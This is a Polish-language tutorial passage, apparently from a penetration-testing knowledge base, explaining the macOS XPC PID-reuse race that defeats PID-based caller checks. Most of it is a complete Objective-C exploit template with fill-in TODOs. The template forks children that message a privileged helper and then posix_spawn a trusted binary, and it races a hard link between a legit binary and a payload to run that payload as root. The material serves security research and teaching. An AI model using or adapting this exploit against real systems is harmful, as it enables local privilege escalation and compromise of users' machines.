Kiedy usługa XPC w macOS sprawdza wywołany proces na podstawie PID a nie na podstawie tokena audytu, jest podatna na atak polegający na ponownym wykorzystaniu PID. Atak ten opiera się na warunku wyścigu, w którym exploit będzie wysyłał wiadomości do usługi XPC, nadużywając funkcjonalności i zaraz po tym wykonując posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ) z dozwolonym plikiem binarnym.
Ta funkcja sprawi, że dozwolony plik binarny przejmie PID, ale złośliwa wiadomość XPC została wysłana tuż przed tym. Dlatego jeśli usługa XPC używa PID do uwierzytelniania nadawcy i sprawdza go PO wykonaniu posix_spawn, będzie myślała, że pochodzi od autoryzowanego procesu.
Przykład wykorzystania
Jeśli znajdziesz funkcję shouldAcceptNewConnection lub funkcję wywoływaną przez nią, która wywołuje processIdentifier i nie wywołuje auditToken, to bardzo prawdopodobne, że sprawdza PID procesu, a nie token audytu.
Na przykład na tym obrazie (zrzut z odnośnika):
Sprawdź ten przykładowy exploit (ponownie z odnośnika), aby zobaczyć 2 części exploitu:
Jedna, która generuje kilka forków
Każdy fork będzie wysyłałładunek do usługi XPC, wykonując jednocześnie posix_spawn zaraz po wysłaniu wiadomości.
Aby exploit działał, ważne jest export`` ``OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES lub umieszczenie wewnątrz exploitu:
Ten przykład używa surowego fork do uruchomienia dzieci, które będą wykorzystywać wyścig PID a następnie wykorzystać inną sytuację wyścigową za pomocą twardego dowiązania:
// export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES
// gcc -framework Foundation expl.m -o expl
#include <Foundation/Foundation.h>
#include <spawn.h>
#include <pthread.h>
// TODO: CHANGE PROTOCOL AND FUNCTIONS
@protocol HelperProtocol
- (void)DoSomething:(void (^)(_Bool))arg1;
@end
// Global flag to track exploitation status
bool pwned = false;
/**
* Continuously overwrite the contents of the 'hard_link' file in a race condition to make the
* XPC service verify the legit binary and then execute as root out payload.
*/
void *check_race(void *arg) {
while(!pwned) {
// Overwrite with contents of the legit binary
system("cat ./legit_bin > hard_link");
usleep(50000);
// Overwrite with contents of the payload to execute
// TODO: COMPILE YOUR OWN PAYLOAD BIN
system("cat ./payload > hard_link");
usleep(50000);
}
return NULL;
}
void child_xpc_pid_rc_abuse(){
// TODO: INDICATE A VALID BIN TO BYPASS SIGN VERIFICATION
#define kValid "./Legit Updater.app/Contents/MacOS/Legit"
extern char **environ;
// Connect with XPC service
// TODO: CHANGE THE ID OF THE XPC TO EXPLOIT
NSString* service_name = @"com.example.Helper";
NSXPCConnection* connection = [[NSXPCConnection alloc] initWithMachServiceName:service_name options:0x1000];
// TODO: CNAGE THE PROTOCOL NAME
NSXPCInterface* interface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperProtocol)];
[connection setRemoteObjectInterface:interface];
[connection resume];
id obj = [connection remoteObjectProxyWithErrorHandler:^(NSError* error) {
NSLog(@"[-] Something went wrong");
NSLog(@"[-] Error: %@", error);
}];
NSLog(@"obj: %@", obj);
NSLog(@"conn: %@", connection);
// Call vulenrable XPC function
// TODO: CHANEG NAME OF FUNCTION TO CALL
[obj DoSomething:^(_Bool b){
NSLog(@"Response, %hdd", b);
}];
// Change current process to the legit binary suspended
char target_binary[] = kValid;
char *target_argv[] = {target_binary, NULL};
posix_spawnattr_t attr;
posix_spawnattr_init(&attr);
short flags;
posix_spawnattr_getflags(&attr, &flags);
flags |= (POSIX_SPAWN_SETEXEC | POSIX_SPAWN_START_SUSPENDED);
posix_spawnattr_setflags(&attr, flags);
posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ);
}
/**
* Function to perform the PID race condition using children calling the XPC exploit.
*/
void xpc_pid_rc_abuse() {
#define RACE_COUNT 1
extern char **environ;
int pids[RACE_COUNT];
// Fork child processes to exploit
for (int i = 0; i < RACE_COUNT; i++) {
int pid = fork();
if (pid == 0) { // If a child process
child_xpc_pid_rc_abuse();
}
printf("forked %d\n", pid);
pids[i] = pid;
}
// Wait for children to finish their tasks
sleep(3);
// Terminate child processes
for (int i = 0; i < RACE_COUNT; i++) {
if (pids[i]) {
kill(pids[i], 9);
}
}
}
int main(int argc, const char * argv[]) {
// Create and set execution rights to 'hard_link' file
system("touch hard_link");
system("chmod +x hard_link");
// Create thread to exploit sign verification RC
pthread_t thread;
pthread_create(&thread, NULL, check_race, NULL);
while(!pwned) {
// Try creating 'download' directory, ignore errors
system("mkdir download 2>/dev/null");
// Create a hardlink
// TODO: CHANGE NAME OF FILE FOR SIGN VERIF RC
system("ln hard_link download/legit_bin");
xpc_pid_rc_abuse();
usleep(10000);
// The payload will generate this file if exploitation is successfull
if (access("/tmp/pwned", F_OK ) == 0) {
pwned = true;
}
}
return 0;
}